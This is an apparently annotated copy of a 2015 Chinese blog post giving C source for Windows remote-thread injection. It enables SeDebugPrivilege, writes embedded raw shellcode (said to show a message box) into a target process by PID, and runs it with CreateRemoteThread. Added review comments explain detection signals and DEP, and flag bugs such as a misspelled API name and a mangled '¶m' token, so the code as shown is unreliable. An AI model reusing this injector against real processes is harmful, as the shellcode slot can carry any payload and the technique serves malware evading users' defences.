Windows线程注入——弹窗ShellCode
2015-01-16 21:15
进行程序线程注入的代码,执行一个弹窗的ShellCode。在Win7 64位之前可以完美运行,但是Win7 64位下插入的代码因为安全机制的原因无法执行,会报错!
/*
 * Sample: copy a byte array (SHELLCODE) into another process, selected by PID,
 * and run it on a new thread there. The API chain used — OpenProcess ->
 * VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread — is the textbook
 * remote-thread injection pattern, and it is exactly the cross-process memory
 * write plus remote thread creation that host-based monitoring (API/ETW
 * telemetry, EDR rules) is built to flag. The author reports it fails on
 * Win7 x64 with a "security mechanism" error.
 */
#include <windef.h>   // NOTE(review): windef.h alone does not declare the Win32 calls used below; windows.h is the usual include
#include <MSCorEE.h>  // NOTE(review): CLR hosting header — nothing in this file appears to use it
#include <stdio.h>

/* Two function pointers handed to the remote thread as its lpParameter (see InjectCode). */
typedef struct _THREAD_PARA
{
    FARPROC pFunc[2];   // [0] intended LoadLibraryA, [1] GetProcAddress — see the lookups in InjectCode
} THREAD_PARAM, *PTHREAD_PARAM;

/* Opaque machine code copied into the target; the post title says it pops a
 * message box. Treated purely as data here — nothing else in this file
 * documents what it does. Being a string-literal initializer it carries a
 * trailing '\0', which sizeof(SHELLCODE) below includes. */
BYTE SHELLCODE[] = {
    "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
    "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
    "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
    "\x49\x0C\x8B\x09\x8B\x09\x8B\x69\x18\xAD\x3D\x6A\x0A\x38\x1E\x75"
    "\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD"
    "\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE"
    "\x06\x3A\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24"
    "\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03"
    "\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9"
    "\x33\xDB\x53\x68\x74\x20\x00\x00\x68\x69\x6b\x61\x73\x68\x53\x61"
    "\x6e\x64\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x8B\xE6\xC3"
};

// Because we inject into another process, a privilege-elevation step is needed
// first (original author's comment). Enables SE_DEBUG_NAME on the current
// process token. All failures are silent, so callers cannot tell whether the
// privilege was actually enabled.
void EnableDebugPriv()
{
    HANDLE hToken;
    LUID sedebugnameValue;
    TOKEN_PRIVILEGES tkp;

    if ( !OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken) )
        return;
    if ( !LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue) )
    {
        CloseHandle(hToken);
        return;
    }
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = sedebugnameValue;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    // NOTE(review): hToken is closed only on the failure branch and leaks on
    // success. A non-zero return also does not prove the privilege was granted
    // (the ERROR_NOT_ALL_ASSIGNED case is never checked).
    if ( !AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL) )
    {
        CloseHandle(hToken);
    }
}

/*
 * Copy a THREAD_PARAM and SHELLCODE into process dwPID, start SHELLCODE on a
 * remote thread with the THREAD_PARAM block as its parameter, and wait for it.
 *
 * dwPID:   target process id.
 * Returns: TRUE unconditionally — no call in this function is checked, so a
 *          failed OpenProcess / VirtualAllocEx / WriteProcessMemory /
 *          CreateRemoteThread still reports success.
 */
BOOL InjectCode(DWORD dwPID)
{
    HMODULE hMod = NULL;
    THREAD_PARAM param = {0,};
    HANDLE hProcess = NULL;
    HANDLE hThread = NULL;
    LPVOID pRemoteBuf[2] = {0,};   // [0] = remote THREAD_PARAM, [1] = remote SHELLCODE

    // Addresses are resolved in THIS process and handed to the target; the code
    // relies on them being valid there too, which is never verified.
    hMod = GetModuleHandleA("Kernel32.dll");   // not checked for NULL
    // NOTE(review): "LoadLlibraryA" is misspelled, so this lookup returns NULL
    // and pFunc[0] stays NULL; whether SHELLCODE ever reads it cannot be told
    // from this file.
    param.pFunc[0] = GetProcAddress(hMod, "LoadLlibraryA");
    param.pFunc[1] = GetProcAddress(hMod, "GetProcAddress");

    // Requests every process right; the returned handle is not checked, so a
    // failed open (e.g. insufficient privilege) is carried into every call below.
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID);

    pRemoteBuf[0] = VirtualAllocEx(hProcess, NULL, sizeof(THREAD_PARAM), MEM_COMMIT, PAGE_READWRITE);
    // NOTE(review): "¶m" reads as an HTML-entity mangling of "&param" (the
    // address of the local struct) in the page text — confirm against the
    // original source.
    WriteProcessMemory(hProcess, pRemoteBuf[0], (LPVOID)¶m, sizeof(THREAD_PARAM), NULL);

    // NOTE(review): this buffer is committed PAGE_READWRITE and then used as a
    // thread start address below. On a system enforcing DEP, executing from a
    // non-executable page faults — consistent with the "security mechanism"
    // error the author reports on Win7 x64; the mitigation is doing its job.
    pRemoteBuf[1] = VirtualAllocEx(hProcess, NULL, sizeof(SHELLCODE), MEM_COMMIT, PAGE_READWRITE );
    WriteProcessMemory(hProcess, pRemoteBuf[1], (LPVOID)&SHELLCODE, sizeof(SHELLCODE), NULL);

    // A thread created in another process whose start address lies in freshly
    // written memory is the signal detection rules key on.
    hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuf[1], pRemoteBuf[0], 0, NULL);
    WaitForSingleObject(hThread, INFINITE);   // blocks forever if the injected thread never exits
    CloseHandle(hThread);
    CloseHandle(hProcess);
    // The two remote allocations are never released (no VirtualFreeEx).
    return TRUE;
}

/*
 * Entry point. The parameters are the conventional argc/argv with the names
 * swapped. args[1] is read without checking the argument count, so running
 * with no argument dereferences a NULL pointer; atoi gives no error signal,
 * and "%d" with a DWORD argument is a printf type mismatch (the "Inout" typo
 * is in the original text).
 */
int main(int argv, char* args[])
{
    EnableDebugPriv();
    DWORD PID = atoi(args[1]);   // TODO: guard with argv > 1 before indexing
    if(PID!=0)
    {
        printf("Inout Pid = %d\n",PID);
        InjectCode(PID);   // return value ignored (it is always TRUE anyway)
    }
    else
        printf("Input ERROR!");
    return 0;
}